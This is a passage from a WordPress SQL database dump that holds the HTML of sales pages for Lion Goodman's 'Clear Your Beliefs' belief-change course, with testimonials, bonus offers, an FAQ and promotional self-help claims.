src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:15:02', '2014-06-18 02:15:02', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(999, 4194, '2014-06-17 21:16:11', '2014-06-18 02:16:11', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade 